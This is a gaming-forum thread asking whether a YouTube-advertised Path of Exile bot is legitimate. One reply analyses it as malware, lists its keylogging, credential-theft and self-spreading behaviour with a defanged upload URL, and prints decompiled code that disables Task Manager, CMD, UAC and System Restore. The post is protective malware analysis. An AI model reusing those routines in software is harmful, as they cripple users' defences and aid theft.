Bot? menu

User Tag List

Thread: Bot?

Results 1 to 14 of 14
  1. #1
    username1001011's Avatar Member
    Reputation
    2
    Join Date
    Apr 2013
    Posts
    120
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Bot?

    Hi there

    I stumbled accross this: https://www.youtube.com/watch?v=SYz2C_wxwVI

    Is this legit? Malware?

    I wonder if anyone has tried it.

    Bot?
  2. #2
    Augury13's Avatar Legendary
    Reputation
    884
    Join Date
    Oct 2012
    Posts
    1,738
    Thanks G/R
    424/74
    Trade Feedback
    7 (100%)
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    "Ratings have been disabled for this video." so Most likely a scam/malware.

  3. #3
    username1001011's Avatar Member
    Reputation
    2
    Join Date
    Apr 2013
    Posts
    120
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by tmanowen View Post
    "Ratings have been disabled for this video." so Most likely a scam/malware.
    good point

  4. #4
    ferrokarr's Avatar Member
    Reputation
    2
    Join Date
    Jun 2008
    Posts
    17
    Thanks G/R
    10/1
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    hmmm "they" have some other interesting hacks too.....( PoEEX )
    i will do a sep. vm and check at weekend

  5. #5
    SKU's Avatar Contributor
    Reputation
    306
    Join Date
    May 2007
    Posts
    565
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    It's a keylogger, information stealer, and much more. Do not execute.

    Virustotal from the embedded dll: https://www.virustotal.com/en/file/d...is/1369861137/
    Last edited by SKU; 05-29-2013 at 04:00 PM.

  6. #6
    username1001011's Avatar Member
    Reputation
    2
    Join Date
    Apr 2013
    Posts
    120
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by SKU View Post
    Well, according to this blog entry, VT isn't all that good - Sarvam Blog: Nearly 70% of Packed Windows System files are labeled as Malware

    Still, if you use a blank external drive with nothing but Win2Go on it and PoE with a new bot account... would it steal the PoE info stuff....
    Last edited by username1001011; 05-30-2013 at 02:02 AM.

  7. #7
    SKU's Avatar Contributor
    Reputation
    306
    Join Date
    May 2007
    Posts
    565
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by username1001011 View Post
    Well, according to this blog entry, VT isn't all that good - Sarvam Blog: Nearly 70% of Packed Windows System files are labeled as Malware

    Still, if you use a blank external drive with nothing but Win2Go on it and PoE with a new bot account... would it steal the PoE info stuff....
    Did you even read the article? What do packed system files have to do with this?

    When I say it's a keylogger etc., I'm not making an assumption based on the VT output. I looked at the code and saw it.

    Here is a very inconclusive list of nasty stuff this program does:
    - Keylogger using a keyboard hook, in PoEEX Bot::KeyHook::Hook(): KeyHook.KHK = KeyHook.SetWindowsHookEx(WH_KEYBOARD_LL, KeyHook.KHD, (int)value, 0);
    - Uploads logs to hxxp://www.limitlessproducts.org/Limitless/Login/submit_log.php as user=wedge92 in PoEXX Bot::mainFunctions::dispatchConfirmation()
    - Takes screenshots of your computer and E-Mails them, PoEXX Bot::mainFunctions::Email()
    - Forces you to login to your Steam account
    - Forces you to login to Skype, sends Skype messages
    - Visit websites
    - Downloads and executes further stuff, possibly on command, didn't check
    - Gets your Firefox, Chrome, Filezilla, Spotify, MSN, Pidgin, SmartFTP, DynDNS, CoreFTP, ... passwords if they are saved on your computer (recovery settings etc)
    - Spreads itself over Skype
    - Uses the ClassLibrary1 module (the embedded DLL) to do a lot more nasty stuff like disabling your TaskMgr, CMD, etc:

    Code:
    // ClassLibrary1.Functions.Other.Disables
    public static void ControlPanel()
    {
    	try
    	{
    		Interaction.Shell("REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f", AppWinStyle.Hide, false, -1);
    	}
    	catch (Exception arg_12_0)
    	{
    		ProjectData.SetProjectError(arg_12_0);
    		ProjectData.ClearProjectError();
    	}
    }
    
    // ClassLibrary1.Functions.Other.Disables
    public static void FolderOptions()
    {
    	try
    	{
    		Interaction.Shell("REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f", AppWinStyle.Hide, false, -1);
    	}
    	catch (Exception arg_12_0)
    	{
    		ProjectData.SetProjectError(arg_12_0);
    		ProjectData.ClearProjectError();
    	}
    }
    
    // ClassLibrary1.Functions.Other.Disables
    public static void Registry()
    {
    	try
    	{
    		MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableRegistryTools", "1", RegistryValueKind.DWord);
    	}
    	catch (Exception arg_24_0)
    	{
    		ProjectData.SetProjectError(arg_24_0);
    		ProjectData.ClearProjectError();
    	}
    }
    
    // ClassLibrary1.Functions.Other.Disables
    public static void SystemRestore()
    {
    	try
    	{
    		MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore", "DisableSR", "1", RegistryValueKind.DWord);
    	}
    	catch (Exception arg_24_0)
    	{
    		ProjectData.SetProjectError(arg_24_0);
    		ProjectData.ClearProjectError();
    	}
    }
    
    // ClassLibrary1.Functions.Other.Disables
    public static void TaskManager()
    {
    	try
    	{
    		MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableTaskMgr", "1", RegistryValueKind.DWord);
    	}
    	catch (Exception arg_24_0)
    	{
    		ProjectData.SetProjectError(arg_24_0);
    		ProjectData.ClearProjectError();
    	}
    }
    
    // ClassLibrary1.Functions.Other.Disables
    public static void Uac()
    {
    	try
    	{
    		Interaction.Shell("C:\\Windows\\System32\\cmd.exe /k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", AppWinStyle.Hide, false, -1);
    	}
    	catch (Exception arg_12_0)
    	{
    		ProjectData.SetProjectError(arg_12_0);
    		ProjectData.ClearProjectError();
    	}
    }
    
    // ClassLibrary1.Functions.Other.Disables
    public static void Cmd()
    {
    	try
    	{
    		MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "DisableCMD", "1", RegistryValueKind.DWord);
    	}
    	catch (Exception arg_24_0)
    	{
    		ProjectData.SetProjectError(arg_24_0);
    		ProjectData.ClearProjectError();
    	}
    }
    I find it great that people don't blindly believe stuff, but really? It's not that hard to look at it yourself, and linking articles that you either didn't read or/nor understand does not help anyone.

  8. #8
    username1001011's Avatar Member
    Reputation
    2
    Join Date
    Apr 2013
    Posts
    120
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by SKU View Post
    I looked at the code and saw it.
    Well, there was no mentioning of it before Thx for your work. Still I wonder if it works or not... and if it does, if all that crap/spy/malware could be removed.

  9. #9
    SKU's Avatar Contributor
    Reputation
    306
    Join Date
    May 2007
    Posts
    565
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by username1001011 View Post
    Well, there was no mentioning of it before Thx for your work. Still I wonder if it works or not... and if it does, if all that crap/spy/malware could be removed.
    If you remove all that crap/spy/malware, you have nothing left. There is no PoE bot inside that executable - it has absolutely nothing to do with PoE; it's just malware.

    Rule of thumb: YouTube video advertising a fancy hack-related program (bot, money-hack, gm-hack, speed-hack, ..)? It's malware.

  10. #10
    username1001011's Avatar Member
    Reputation
    2
    Join Date
    Apr 2013
    Posts
    120
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by SKU View Post
    Rule of thumb: YouTube video advertising a fancy hack-related program (bot, money-hack, gm-hack, speed-hack, ..)? It's malware.
    You might have a good point there there... too bad really

  11. #11
    corererr's Avatar Master Sergeant
    Reputation
    51
    Join Date
    Dec 2011
    Posts
    122
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Is there any bot outside? :-)

  12. #12
    username1001011's Avatar Member
    Reputation
    2
    Join Date
    Apr 2013
    Posts
    120
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Here someone complains about lots of bots:

    Forum - General Discussion - Holy shoot!!Lots of bots are farming orbs and mirrors!!!!!anyone stop them??? - Path of Exile

    but couldn't really find one yet....

  13. #13
    corererr's Avatar Master Sergeant
    Reputation
    51
    Join Date
    Dec 2011
    Posts
    122
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    any news of the bots? i dont find one

  14. #14
    username1001011's Avatar Member
    Reputation
    2
    Join Date
    Apr 2013
    Posts
    120
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by corererr View Post
    any news of the bots? i dont find one
    Have a look here: http://www.ownedcore.com/forums/mmo/...pha-v0-3a.html

Similar Threads

  1. World of Warcraft WoW!Bot (GetALifeBot) 0.61 for WoW 1.9.4 + FishBot
    By Matt in forum World of Warcraft Bots and Programs
    Replies: 43
    Last Post: 04-18-2006, 04:55 AM
  2. WoWGlider and GALB Botting Locations
    By Matt in forum World of Warcraft Bots and Programs
    Replies: 14
    Last Post: 04-11-2006, 08:01 PM
  3. Bot for gaining XP
    By JesseG18 in forum World of Warcraft General
    Replies: 1
    Last Post: 03-09-2006, 08:52 PM
  4. World of Warcraft Bot (GetALifeBot) 0.57 working with 1.9.4
    By Matt in forum World of Warcraft Bots and Programs
    Replies: 7
    Last Post: 03-07-2006, 09:43 PM
  5. Best Botting/Grinding Locations
    By Matt in forum World of Warcraft Exploits
    Replies: 0
    Last Post: 02-27-2006, 12:39 AM
All times are GMT -5. The time now is 09:21 PM. Powered by vBulletin® Version 4.2.3
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2024 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search